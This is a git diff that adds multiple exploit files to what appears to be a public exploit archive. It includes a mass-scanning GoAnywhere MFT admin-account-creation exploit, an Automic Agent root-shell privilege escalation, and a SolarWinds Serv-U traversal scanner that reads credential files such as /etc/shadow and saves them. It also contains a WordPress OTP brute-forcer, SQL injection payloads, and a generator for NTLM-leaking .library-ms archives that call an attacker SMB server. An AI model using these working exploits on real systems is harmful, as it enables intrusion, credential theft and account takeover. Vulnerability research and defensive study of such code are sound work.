for admin account creation + data = { + "j_id_u:creteAdminGrid:username": self.username, + "j_id_u:creteAdminGrid:password_hinput": self.password, + "j_id_u:creteAdminGrid:password": "%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2", + "j_id_u:creteAdminGrid:confirmPassword_hinput": self.password, + "j_id_u:creteAdminGrid:confirmPassword": "%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2", + "j_id_u:creteAdminGrid:submitButton": "", + "createAdminForm_SUBMIT": 1, + "javax.faces.ViewState": view_state['value'] + } + + # Attempt to create admin account + create_response = session.post( + url, + headers=self.headers, + data=data, + verify=False, + timeout=self.timeout + ) + + if create_response.status_code == 200: + print(f"{Fore.GREEN}[+] {Style.RESET_ALL}{target} - Admin account created successfully via {exploit_path}! Username: {self.username}, Password: {self.password}") + result["admin_created"] = True + result["message"] = f"Admin account created successfully! Username: {self.username}, Password: {self.password}" + else: + print(f"{Fore.RED}[-] {Style.RESET_ALL}{target} - Failed to create admin account via {exploit_path} (Status: {create_response.status_code})") + result["message"] = f"Failed to create admin account (Status: {create_response.status_code})" + + except Exception as e: + print(f"{Fore.RED}[!] {Style.RESET_ALL}{target} - Error extracting form data: {str(e)}") + result["message"] = f"Error extracting form data: {str(e)}" + result["error"] = str(e) + + except requests.exceptions.ConnectTimeout: + print(f"{Fore.YELLOW}[!] {Style.RESET_ALL}{target} - Connection timeout") + result["message"] = "Connection timeout" + result["error"] = "Connection timeout" + self.error_targets.append(target) + + except requests.exceptions.ConnectionError: + print(f"{Fore.YELLOW}[!] {Style.RESET_ALL}{target} - Connection error") + result["message"] = "Connection error" + result["error"] = "Connection error" + self.error_targets.append(target) + + except Exception as e: + print(f"{Fore.RED}[!] {Style.RESET_ALL}{target} - Error: {str(e)}") + result["message"] = f"Error: {str(e)}" + result["error"] = str(e) + self.error_targets.append(target) + + return result + + def scan_targets(self, targets: List[str]) -> None: + """ + Scan multiple targets concurrently + + Args: + targets: List of targets to scan + """ + with concurrent.futures.ThreadPoolExecutor(max_workers=MAX_THREADS) as executor: + executor.map(self.check_target, targets) + + def load_targets_from_file(self, file_path: str) -> List[str]: + """ + Load targets from a file + + Args: + file_path: Path to the file containing targets + + Returns: + List of targets + """ + if not os.path.exists(file_path): + print(f"{Fore.RED}[!] {Style.RESET_ALL}File not found: {file_path}") + return [] + + try: + with open(file_path, "r") as f: + return [line.strip() for line in f if line.strip()] + except Exception as e: + print(f"{Fore.RED}[!] {Style.RESET_ALL}Error reading file: {str(e)}") + return [] + + def print_summary(self) -> None: + """Print a summary of the scanning results""" + print(f"\n{Fore.CYAN}[*] {Style.RESET_ALL}Scan Summary:") + print(f"{Fore.GREEN}[+] {Style.RESET_ALL}Vulnerable targets: {len(self.vulnerable_targets)}") + print(f"{Fore.RED}[-] {Style.RESET_ALL}Non-vulnerable targets: {len(self.non_vulnerable_targets)}") + print(f"{Fore.YELLOW}[!] {Style.RESET_ALL}Error targets: {len(self.error_targets)}") + + if self.vulnerable_targets: + print(f"\n{Fore.GREEN}[+] {Style.RESET_ALL}Vulnerable targets:") + for target in self.vulnerable_targets: + print(f" - {target}") + + +def validate_args(args): + """Validate command line arguments""" + if not args.target and not args.file: + print(f"{Fore.RED}[!] {Style.RESET_ALL}Error: You must specify either a target (-t) or a file (-f)") + return False + + if args.file and not os.path.exists(args.file): + print(f"{Fore.RED}[!] {Style.RESET_ALL}Error: File not found: {args.file}") + return False + + if not args.username or not args.password: + print(f"{Fore.RED}[!] {Style.RESET_ALL}Error: You must specify both username (-u) and password (-p)") + return False + + return True + + +def main(): + """Main function""" + parser = argparse.ArgumentParser(description="CVE-2024-0204: Fortra GoAnywhere MFT Authentication Bypass Exploit") + + parser.add_argument('-t', '--target', help="Target host to check (e.g., 'example.com' or '192.168.1.1')") + parser.add_argument('-f', '--file', help="File containing targets, one per line") + parser.add_argument('-u', '--username', help="Username for the admin account to create") + parser.add_argument('-p', '--password', help="Password for the admin account to create") + parser.add_argument('--timeout', type=int, default=DEFAULT_TIMEOUT, help=f"Connection timeout in seconds (default: {DEFAULT_TIMEOUT})") + parser.add_argument('--threads', type=int, default=MAX_THREADS, help=f"Number of concurrent threads for scanning (default: {MAX_THREADS})") + + args = parser.parse_args() + + # Show banner + Banner.show() + + # Validate arguments + if not validate_args(args): + parser.print_help() + sys.exit(1) + + # Initialize exploit + exploit = GoAnywhereExploit( + username=args.username, + password=args.password, + timeout=args.timeout + ) + + # Handle single target + if args.target: + print(f"{Fore.CYAN}[*] {Style.RESET_ALL}Checking single target: {args.target}") + exploit.check_target(args.target) + + # Handle targets from file + elif args.file: + targets = exploit.load_targets_from_file(args.file) + if not targets: + print(f"{Fore.RED}[!] {Style.RESET_ALL}No valid targets found in the file") + sys.exit(1) + + print(f"{Fore.CYAN}[*] {Style.RESET_ALL}Loaded {len(targets)} targets from file") + print(f"{Fore.CYAN}[*] {Style.RESET_ALL}Starting scan with {args.threads} threads...\n") + + exploit.scan_targets(targets) + + # Print summary + exploit.print_summary() + + +if __name__ == "__main__": + try: + main() + except KeyboardInterrupt: + print(f"\n{Fore.YELLOW}[!] {Style.RESET_ALL}Scan interrupted by user") + sys.exit(0) + except Exception as e: + print(f"{Fore.RED}[!] {Style.RESET_ALL}Unhandled error: {str(e)}") + sys.exit(1) \ No newline at end of file diff --git a/exploits/multiple/remote/52309.txt b/exploits/multiple/remote/52309.txt new file mode 100644 index 000000000..81d4d1c33 --- /dev/null +++ b/exploits/multiple/remote/52309.txt @@ -0,0 +1,13 @@ +# Exploit Title: Automic Agent 24.3.0 HF4 - Privilege Escalation +# Date: 26.05.2025 +# Exploit Author: Flora Schäfer +# Vendor Homepage: https://www.broadcom.com/products/software/automation/automic-automation +# Version: <24.3.0 HF4, <21.0.13 HF1 +# Tested on: Linux +# CVE : CVE-2025-4971 + +1. Generate shared object file using msfvenom +$ msfvenom -p linux/x64/exec PrependSetuid=True PrependSetguid=True CMD="/bin/sh" -f elf-so > /tmp/sh.so + +2. Run the ucxjlx6 executable as follows +$ ./ucxjlx6 ini=<(echo -e "[GLOBAL]\nhelplib = /dev/null\nsystem = blep\n[MISC]\nauthentication = PAM\n[PAM]\nlibName = /tmp/sh.so\n[VARIABLES]\nUC_EX_JOB_MD=blep") \ No newline at end of file diff --git a/exploits/multiple/remote/52311.py b/exploits/multiple/remote/52311.py new file mode 100755 index 000000000..28be25c70 --- /dev/null +++ b/exploits/multiple/remote/52311.py @@ -0,0 +1,408 @@ +# Exploit Title: SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal +# Date: 2025-05-28 +# Exploit Author: @ibrahimsql +# Exploit Author's github: https://github.com/ibrahimsql +# Vendor Homepage: https://www.solarwinds.com/serv-u-managed-file-transfer-server +# Software Link: https://www.solarwinds.com/serv-u-managed-file-transfer-server/registration +# Version: <= 15.4.2 HF1 +# Tested on: Kali Linux 2024.1 +# CVE: CVE-2024-28995 +# Description: +# SolarWinds Serv-U was susceptible to a directory traversal vulnerability that would allow +# attackers to read sensitive files on the host machine. This exploit demonstrates multiple +# path traversal techniques to access Serv-U log files and other system files on both +# Windows and Linux systems. +# +# References: +# - https://nvd.nist.gov/vuln/detail/cve-2024-28995 +# - https://www.rapid7.com/blog/post/2024/06/11/etr-cve-2024-28995-trivially-exploitable-information-disclosure-vulnerability-in-solarwinds-serv-u/ +# - https://thehackernews.com/2024/06/solarwinds-serv-u-vulnerability-under.html + +# Requirements: urllib3>=1.26.0 , colorama>=0.4.4 , requests>=2.25.0 + + +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- + +import argparse +import concurrent.futures +import json +import os +import re +import sys +import time +from concurrent.futures import ThreadPoolExecutor, as_completed +from urllib.parse import urlparse + +import requests +from colorama import Fore, Back, Style, init + +# Initialize colorama +init(autoreset=True) + +# Disable SSL warnings +try: + import urllib3 + urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) +except ImportError: + pass + +BASE_DIR = os.path.dirname(os.path.abspath(__file__)) + +BANNER = rf''' +{Fore.CYAN} + ______ _______ ____ ___ ____ _ _ ____ ___ ___ ___ ____ + / ___\ \ / / ____| |___ \ / _ \___ \| || | |___ \( _ )/ _ \ / _ \| ___| + | | \ \ / /| _| _____ __) | | | |__) | || |_ _____ __) / _ \ (_) | (_) |___ \ + | |___ \ V / | |__|_____/ __/| |_| / __/|__ _|_____/ __/ (_) \__, |\__, |___) | + \____| \_/ |_____| |_____|\___/_____| |_| |_____\___/ /_/ /_/|____/ +{Fore.YELLOW} + SolarWinds Serv-U Directory Traversal Exploit +{Fore.RED} CVE-2024-28995 by @ibrahimsql +{Style.RESET_ALL} +''' + +class ScanResult: + def __init__(self, url, is_vulnerable=False, version=None, os_type=None, file_content=None, path=None): + self.url = url + self.is_vulnerable = is_vulnerable + self.version = version + self.os_type = os_type + self.file_content = file_content + self.path = path + self.timestamp = time.strftime("%Y-%m-%d %H:%M:%S") + + def to_dict(self): + return { + "url": self.url, + "is_vulnerable": self.is_vulnerable, + "version": self.version, + "os_type": self.os_type, + "path": self.path, + "timestamp": self.timestamp + } + +def print_banner(): + print(BANNER) + +def normalize_url(url): + """Normalize URL to ensure it has http/https protocol.""" + if not url.startswith('http'): + url = f"https://{url}" + return url.rstrip('/') + +def extract_server_version(headers): + """Extract Serv-U version from server headers if available.""" + if 'Server' in headers: + server_header = headers['Server'] + # Look for Serv-U version pattern + match = re.search(r'Serv-U/(\d+\.\d+\.\d+)', server_header) + if match: + return match.group(1) + return None + +def is_vulnerable_version(version): + """Check if the detected version is vulnerable (15.4.2 HF1 or lower).""" + if not version: + return None + + try: + # Split version numbers + major, minor, patch = map(int, version.split('.')) + + # Vulnerable if lower than 15.4.2 HF2 + if major < 15: + return True + elif major == 15: + if minor < 4: + return True + elif minor == 4: + if patch <= 2: # We're assuming patch 2 is 15.4.2 HF1 which is vulnerable + return True + except: + pass + + return False + +def get_request(url, timeout=15): + """Make a GET request to the specified URL.""" + try: + response = requests.get(url, verify=False, timeout=timeout, allow_redirects=False) + return response + except requests.RequestException as e: + return None + +def detect_os_type(content): + """Detect the operating system type from the file content.""" + if any(indicator in content for indicator in ["root:", "bin:x:", "daemon:", "/etc/", "/home/", "/var/"]): + return "Linux" + elif any(indicator in content for indicator in ["[fonts]", "[extensions]", "[Mail]", "Windows", "ProgramData", "Program Files"]): + return "Windows" + return None + +def get_default_payloads(): + """Return a list of directory traversal payloads specific to CVE-2024-28995.""" + return [ + # Windows payloads - Serv-U specific files + {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log"}, + {"path": "/?InternalDir=/../../../../ProgramData/RhinoSoft/Serv-U/^&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log Alt"}, + {"path": "/?InternalDir=\\..\\..\\..\\..\\ProgramData\\RhinoSoft\\Serv-U\\&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log Alt2"}, + {"path": "/?InternalDir=../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log Alt3"}, + {"path": "/?InternalDir=../../../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log Deep"}, + + {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=ServUStartupLog.txt", "name": "Serv-U Startup Log Alt4"}, + {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U.Log", "name": "Serv-U Log"}, + {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=ServULog.txt", "name": "Serv-U Log Alt"}, + {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=ServUErrorLog.txt", "name": "Serv-U Error Log"}, + {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-ErrorLog.txt", "name": "Serv-U Error Log Alt"}, + {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U.ini", "name": "Serv-U Config"}, + {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=ServUAdmin.ini", "name": "Serv-U Admin Config"}, + {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/Users/&InternalFile=Users.txt", "name": "Serv-U Users"}, + {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/Users/&InternalFile=UserAccounts.txt", "name": "Serv-U User Accounts"}, + + # Verify Windows with various system files + {"path": "/?InternalDir=/../../../../windows&InternalFile=win.ini", "name": "Windows ini"}, + {"path": "/?InternalDir=\\..\\..\\..\\..\\windows&InternalFile=win.ini", "name": "Windows ini Alt"}, + {"path": "/?InternalDir=../../../../windows&InternalFile=win.ini", "name": "Windows ini Alt2"}, + {"path": "/?InternalDir=../../../../../../windows&InternalFile=win.ini", "name": "Windows ini Deep"}, + {"path": "/?InternalDir=/./../../../Windows/system.ini", "name": "Windows system.ini"}, + {"path": "/?InternalDir=/./../../../Windows/System32/&InternalFile=drivers.ini", "name": "Windows drivers.ini"}, + {"path": "/?InternalDir=/./../../../Windows/System32/drivers/etc/&InternalFile=hosts", "name": "Windows hosts"}, + {"path": "/?InternalDir=/./../../../Windows/System32/&InternalFile=config.nt", "name": "Windows config.nt"}, + {"path": "/?InternalDir=/./../../../Windows/System32/&InternalFile=ntuser.dat", "name": "Windows ntuser.dat"}, + {"path": "/?InternalDir=/./../../../Windows/boot.ini", "name": "Windows boot.ini"}, + + # Verify Linux with various system files + {"path": "/?InternalDir=\\..\\..\\..\\..\\etc&InternalFile=passwd", "name": "Linux passwd"}, + {"path": "/?InternalDir=/../../../../etc^&InternalFile=passwd", "name": "Linux passwd Alt"}, + {"path": "/?InternalDir=\\..\\..\\..\\..\\etc/passwd", "name": "Linux passwd Alt2"}, + {"path": "/?InternalDir=../../../../etc&InternalFile=passwd", "name": "Linux passwd Alt3"}, + {"path": "/?InternalDir=../../../../../../etc&InternalFile=passwd", "name": "Linux passwd Deep"}, + {"path": "/?InternalDir=/./../../../etc/&InternalFile=shadow", "name": "Linux shadow"}, + {"path": "/?InternalDir=/./../../../etc/&InternalFile=hosts", "name": "Linux hosts"}, + {"path": "/?InternalDir=/./../../../etc/&InternalFile=hostname", "name": "Linux hostname"}, + {"path": "/?InternalDir=/./../../../etc/&InternalFile=issue", "name": "Linux issue"}, + {"path": "/?InternalDir=/./../../../etc/&InternalFile=os-release", "name": "Linux os-release"} + ] + +def create_custom_payload(directory, filename): + """Create a custom payload with the specified directory and filename.""" + # Try both encoding styles + payloads = [ + {"path": f"/?InternalDir=/./../../../{directory}&InternalFile={filename}", "name": f"Custom {filename}"}, + {"path": f"/?InternalDir=/../../../../{directory}^&InternalFile={filename}", "name": f"Custom {filename} Alt"}, + {"path": f"/?InternalDir=\\..\\..\\..\\..\\{directory}&InternalFile={filename}", "name": f"Custom {filename} Alt2"} + ] + return payloads + +def load_wordlist(wordlist_path): + """Load custom paths from a wordlist file.""" + payloads = [] + try: + with open(wordlist_path, 'r') as f: + for line in f: + line = line.strip() + if line and not line.startswith('#'): + # Check if the line contains a directory and file separated by a delimiter + if ':' in line: + directory, filename = line.split(':', 1) + payloads.extend(create_custom_payload(directory, filename)) + else: + # Assume it's a complete path + payloads.append({"path": line, "name": f"Wordlist: {line[:20]}..."}) + return payloads + except Exception as e: + print(f"{Fore.RED}[!] Error loading wordlist: {e}{Style.RESET_ALL}") + return [] + +def scan_target(url, custom_payloads=None): + """Scan a target URL for the CVE-2024-28995 vulnerability.""" + url = normalize_url(url) + result = ScanResult(url) + + # Try to get server version first + try: + response = get_request(url) + if response and response.headers: + result.version = extract_server_version(response.headers) + vulnerable_version = is_vulnerable_version(result.version) + + if vulnerable_version is False: + print(f"{Fore.YELLOW}[*] {url} - Serv-U version {result.version} appears to be patched{Style.RESET_ALL}") + # Still continue scanning as version detection may not be reliable + except Exception as e: + pass + + # Get all payloads to try + payloads = get_default_payloads() + if custom_payloads: + payloads.extend(custom_payloads) + + # Try each payload + for payload in payloads: + full_url = f"{url}{payload['path']}" + try: + print(f"{Fore.BLUE}[*] Trying: {payload['name']} on {url}{Style.RESET_ALL}") + response = get_request(full_url) + + if response and response.status_code == 200: + content = response.text + + # Check if the response contains meaningful content + if len(content) > 100: # Arbitrary threshold to filter out error pages + os_type = detect_os_type(content) + if os_type: + result.is_vulnerable = True + result.os_type = os_type + result.file_content = content + result.path = payload['path'] + + print(f"{Fore.GREEN}[+] {Fore.RED}VULNERABLE: {url} - {payload['name']} - Detected {os_type} system{Style.RESET_ALL}") + + # Successful match - no need to try more payloads + return result + except Exception as e: + continue + + if not result.is_vulnerable: + print(f"{Fore.RED}[-] Not vulnerable: {url}{Style.RESET_ALL}") + + return result + +def scan_multiple_targets(targets, custom_dir=None, custom_file=None, wordlist=None): + """Scan multiple targets using thread pool.""" + results = [] + custom_payloads = [] + + # Add custom payloads if specified + if custom_dir and custom_file: + custom_payloads.extend(create_custom_payload(custom_dir, custom_file)) + + # Add wordlist payloads if specified + if wordlist: + custom_payloads.extend(load_wordlist(wordlist)) + + print(f"{Fore.CYAN}[*] Starting scan of {len(targets)} targets with {len(custom_payloads) + len(get_default_payloads())} payloads{Style.RESET_ALL}") + + # Use fixed thread count of 10 + with ThreadPoolExecutor(max_workers=10) as executor: + future_to_url = {executor.submit(scan_target, target, custom_payloads): target for target in targets} + + for future in as_completed(future_to_url): + try: + result = future.result() + results.append(result) + except Exception as e: + print(f"{Fore.RED}[!] Error scanning {future_to_url[future]}: {e}{Style.RESET_ALL}") + + return results + +def save_results(results, output_file): + """Save scan results to a JSON file.""" + output_data = [result.to_dict() for result in results] + + try: + with open(output_file, 'w') as f: + json.dump(output_data, f, indent=2) + print(f"{Fore.GREEN}[+] Results saved to {output_file}{Style.RESET_ALL}") + except Exception as e: + print(f"{Fore.RED}[!] Error saving results: {e}{Style.RESET_ALL}") + +def save_vulnerable_content(result, output_dir): + """Save the vulnerable file content to a file.""" + if not os.path.exists(output_dir): + os.makedirs(output_dir) + + # Create a safe filename from the URL + parsed_url = urlparse(result.url) + safe_filename = f"{parsed_url.netloc.replace(':', '_')}.txt" + output_path = os.path.join(output_dir, safe_filename) + + try: + with open(output_path, 'w') as f: + f.write(f"URL: {result.url}\n") + f.write(f"Path: {result.path}\n") + f.write(f"Version: {result.version or 'Unknown'}\n") + f.write(f"OS Type: {result.os_type or 'Unknown'}\n") + f.write(f"Timestamp: {result.timestamp}\n") + f.write("\n--- File Content ---\n") + f.write(result.file_content) + + print(f"{Fore.GREEN}[+] Saved vulnerable content to {output_path}{Style.RESET_ALL}") + except Exception as e: + print(f"{Fore.RED}[!] Error saving content: {e}{Style.RESET_ALL}") + +def main(): + parser = argparse.ArgumentParser(description="CVE-2024-28995 - SolarWinds Serv-U Directory Traversal Scanner") + parser.add_argument("-u", "--url", help="Target URL") + parser.add_argument("-f", "--file", help="File containing a list of URLs to scan") + parser.add_argument("-d", "--dir", help="Custom directory path to read (e.g., ProgramData/RhinoSoft/Serv-U/)") + parser.add_argument("-n", "--filename", help="Custom filename to read (e.g., Serv-U-StartupLog.txt)") + parser.add_argument("-w", "--wordlist", help="Path to wordlist containing custom paths to try") + parser.add_argument("-o", "--output", help="Output JSON file to save results") + + args = parser.parse_args() + + print_banner() + + # Validate arguments + if not args.url and not args.file: + parser.print_help() + print(f"\n{Fore.RED}[!] Error: Either -u/--url or -f/--file is required{Style.RESET_ALL}") + sys.exit(1) + + targets = [] + + # Get targets + if args.url: + targets.append(args.url) + + if args.file: + try: + with open(args.file, "r") as f: + targets.extend([line.strip() for line in f.readlines() if line.strip()]) + except Exception as e: + print(f"{Fore.RED}[!] Error reading file {args.file}: {e}{Style.RESET_ALL}") + sys.exit(1) + + # Deduplicate targets + targets = list(set(targets)) + + if not targets: + print(f"{Fore.RED}[!] No valid targets provided.{Style.RESET_ALL}") + sys.exit(1) + + print(f"{Fore.CYAN}[*] Loaded {len(targets)} target(s){Style.RESET_ALL}") + + # Set output file + output_file = args.output or f"cve_2024_28995_results_{time.strftime('%Y%m%d_%H%M%S')}.json" + + # Start scanning + results = scan_multiple_targets(targets, args.dir, args.filename, args.wordlist) + + # Process results + vulnerable_count = sum(1 for result in results if result.is_vulnerable) + + print(f"\n{Fore.CYAN}[*] Scan Summary:{Style.RESET_ALL}") + print(f"{Fore.CYAN}[*] Total targets: {len(results)}{Style.RESET_ALL}") + print(f"{Fore.GREEN if vulnerable_count > 0 else Fore.RED}[*] Vulnerable targets: {vulnerable_count}{Style.RESET_ALL}") + + # Save results + save_results(results, output_file) + + # Save vulnerable file contents + for result in results: + if result.is_vulnerable and result.file_content: + save_vulnerable_content(result, "vulnerable_files") + + print(f"\n{Fore.GREEN}[+] Scan completed successfully!{Style.RESET_ALL}") + +if __name__ == "__main__": + try: + main() + except KeyboardInterrupt: + print(f"\n{Fore.YELLOW}[!] Scan interrupted by user{Style.RESET_ALL}") + sys.exit(0) + except Exception as e: + print(f"\n{Fore.RED}[!] An error occurred: {e}{Style.RESET_ALL}") + sys.exit(1) \ No newline at end of file diff --git a/exploits/multiple/webapps/52307.txt b/exploits/multiple/webapps/52307.txt new file mode 100644 index 000000000..aa862ebaa --- /dev/null +++ b/exploits/multiple/webapps/52307.txt @@ -0,0 +1,74 @@ +# Exploit Title: WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing +# Google Dork: inurl:/wp-content/plugins/digits/ +# Date: 2025-04-30 +# Exploit Author: Saleh Tarawneh +# Vendor Homepage: https://digits.unitedover.com/ +# Version: < 8.4.6.1 +# CVE : CVE-2025-4094 + +""" +The Digits plugin for WordPress prior to version 8.4.6.1 is vulnerable to OTP brute-force attacks due to missing rate limiting. +An attacker can exploit this to bypass authentication or password reset by iterating over possible OTP values. + +This PoC targets the "Forgot Password" flow and automates the attack, which is the same concept that is valid for the registration flow. + +CWE-287: Improper Authentication +CVSS v3.1: 9.8 (Critical) +OWASP A2: Broken Authentication + +[Instructions] +1. Use a tool like Burp Suite or your browser’s developer tools to intercept the OTP verification request. +2. Copy the exact request parameters +3. Replace the placeholder values in the script with real data from the intercepted request. +4. Run the script to brute-force 4-digit OTPs (0000 to 9999) or you can change it to 6-digit. + +[Alternative Method – Burp Suite Pro] + +If you have Burp Suite Pro, you can perform the OTP brute-force attack manually: + +1. Intercept the OTP request using Burp Proxy. +2. Send the request to Intruder. +3. Mark the `sms_otp` parameter as the payload position. +4. Load a payload list from `000000` to `999999` (for 6-digit OTPs). +5. Start the attack and monitor responses for a different status code, length, or success message. + +""" + +import requests + +def brute(otp): + url = "https://example.com/wp-admin/admin-ajax.php" + data = { # Replace with targets data + "login_digt_countrycode": "+", + "digits_phone": "000000000", + "action_type": "phone", + "sms_otp": otp, + "otp_step_1": "1", + "instance_id": "xxxxxxx", + "action": "digits_forms_ajax", + "type": "forgot", + "forgot_pass_method": "sms_otp", + "digits": "1", + "digits_redirect_page": "//example.com/", + "digits_form": "xxxxxxxx", + "_wp_http_referer": "/?login=true" + } + headers = { + "User-Agent": "Mozilla/5.0", + "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", + "X-Requested-With": "XMLHttpRequest", + "Referer": "https://example.com/?login=true" # Replace with intercepted referer + } + response = requests.post(url, data=data, headers=headers) + if '"success":true' in response.text: + print(f"[+] OTP FOUND: {otp}") + exit() + +def main(): + for otp in range(0, 10000): # range(0, 1000000): for 6-digit + otp_str = f"{otp:04d}" # {otp:06d} for 6-digit + print(f"[*] Trying OTP: {otp_str}") + brute(otp_str) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/multiple/webapps/52312.txt b/exploits/multiple/webapps/52312.txt new file mode 100644 index 000000000..c3a761653 --- /dev/null +++ b/exploits/multiple/webapps/52312.txt @@ -0,0 +1,72 @@ +# Exploit Title: Campcodes Online Hospital Management System 1.0 - SQL Injection +# Google Dork: N/A +# Exploit Author: Carine Constantino +# Vendor Homepage: https://www.campcodes.com +# Software Link: https://www.campcodes.com/projects/online-hospital-management-system-using-php-and-mysql/ +# Version: 1.0 +# Tested on: Linux - Ubuntu Ubuntu 23.10 +# CVE: CVE-2025-5298 + +# Campcodes Online Hospital Management System 1.0 is vulnerable to SQL Injection +# The report in admin/betweendates-detailsreports.php does not validate ‘fromdate’ and ‘todate’ fields +# And allows the processing of SQL Injection queries of the types: + +# blind time-based in the ‘fromdate’ field +# boolean-based in the ‘todate’ field +# Union Query in the ‘todate’ field + +‘fromdate’ field is vulnerable to SQL Injection on reports accessed on “/admin/betweendates-detailsreports.php” from POST request + +POST /HospitalManagementSystem/hospital/hms/admin/betweendates-detailsreports.php HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded +Content-Length: 45 +Origin: http://127.0.0.1 +Connection: keep-alive +Referer: http://127.0.0.1/HospitalManagementSystem/hospital/hms/admin/between-dates-reports.php +Cookie: ajs_anonymous_id=e18be7d3-2b50-4bed-9962-5cfab989426f; PHPSESSID=hfb8j1phivvf11o2j9cd492oqe +Upgrade-Insecure-Requests: 1 +Priority: u=0, i + +fromdate=&todate=&submit= + +=======================================|| Blind Time Based - ‘fromdate’ field ||============================================== + +SQLMap identified the following injection payload: + +Parameter: fromdate (POST) + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: fromdate=2019-01-01' AND (SELECT 5962 FROM (SELECT(SLEEP(5)))danz) AND 'awPP'='awPP&todate=2025-05-28&submit= + +SQLMap first command to confirm the vulnerability: “sqlmap -r request.txt -p fromdate --dbs --random-agent --technique=T” + + +=======================================|| Boolean Based - ‘todate’ field ||============================================== + +‘todate’ field is vulnerable to SQL Injection on reports accessed on “/admin/betweendates-detailsreports.php” from POST request +SQLMap identified the following injection payload: + +Parameter: todate (POST) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: fromdate=2019-01-01&todate=2025-05-28' AND 3290=3290 AND 'yOfc'='yOfc&submit= + +SQLMap first command to confirm the vulnerability: “sqlmap -r request.txt -p todate --dbs --random-agent --technique=B” + +=======================================|| Union Query - ‘todate’ field ||============================================== + +Another technique on ‘todate’ field can be exploited +SQLMap identified the following injection payload: + +Parameter: todate (POST) + Type: UNION query + Title: Generic UNION query (NULL) - 11 columns + Payload: fromdate=2019-01-01&todate=2025-05-28' UNION ALL SELECT CONCAT(CONCAT('qkpxq','eLwmjRlXmPYByrACqjbUDqzOqYmBeKwQSUSMNXdM'),'qzzbq'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ckvh&submit= + + +SQLMap first command to confirm the vulnerability: “sqlmap -r request.txt -p todate --dbs --random-agent --technique=U” \ No newline at end of file diff --git a/exploits/windows/remote/52310.py b/exploits/windows/remote/52310.py new file mode 100755 index 000000000..cde0bf91b --- /dev/null +++ b/exploits/windows/remote/52310.py @@ -0,0 +1,85 @@ +#!/usr/bin/env python3 +# Exploit Title: Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure +# Exploit Author: Mohammed Idrees Banyamer +# Twitter/GitHub:https://github.com/mbanyamer +# Date: 2025-05-27 +# CVE: CVE-2025-24071 +# Vendor: Microsoft +# Affected Versions: Windows 10/11 (All supporting .library-ms and SMB) +# Tested on: Windows 11 (23H2) +# Type: Local / Remote (NTLM Leak) +# Platform: Windows +# Vulnerability Type: Information Disclosure +# Description: +# Windows Explorer automatically initiates an SMB authentication request when a +# .library-ms file is extracted from a ZIP archive. This causes NTLM credentials +# (in hashed format) to be leaked to a remote SMB server controlled by the attacker. +# No user interaction is required beyond extraction. + +import zipfile +from pathlib import Path +import argparse +import re +import sys +from colorama import Fore, Style + +def create_library_ms(ip: str, filename: str, output_dir: Path) -> Path: + """Creates a malicious .library-ms file pointing to an attacker's SMB server.""" + payload = f''' + + + + + \\\\{ip}\\shared + + + +''' + + output_file = output_dir / f"{filename}.library-ms" + output_file.write_text(payload, encoding="utf-8") + return output_file + +def build_zip(library_file: Path, output_zip: Path): + """Packages the .library-ms file into a ZIP archive.""" + with zipfile.ZipFile(output_zip, 'w', zipfile.ZIP_DEFLATED) as archive: + archive.write(library_file, arcname=library_file.name) + print(f"{Fore.GREEN}[+] Created ZIP: {output_zip}{Style.RESET_ALL}") + +def is_valid_ip(ip: str) -> bool: + return re.match(r"^\d{1,3}(\.\d{1,3}){3}$", ip) is not None + +def main(): + parser = argparse.ArgumentParser( + description="CVE-2025-24071 - NTLM Hash Disclosure via .library-ms ZIP Archive", + epilog="example:\n python3 CVE-2025-24071_tool.py -i 192.168.1.100 -n payload1 -o ./output_folder --keep", + formatter_class=argparse.RawTextHelpFormatter + ) + + parser.add_argument("-i", "--ip", required=True, help="Attacker SMB IP address (e.g., 192.168.1.100)") + parser.add_argument("-n", "--name", default="malicious", help="Base filename (default: malicious)") + parser.add_argument("-o", "--output", default="output", help="Output directory (default: ./output)") + parser.add_argument("--keep", action="store_true", help="Keep .library-ms file after ZIP creation") + + args = parser.parse_args() + + if not is_valid_ip(args.ip): + print(f"{Fore.RED}[!] Invalid IP address: {args.ip}{Style.RESET_ALL}") + sys.exit(1) + + output_dir = 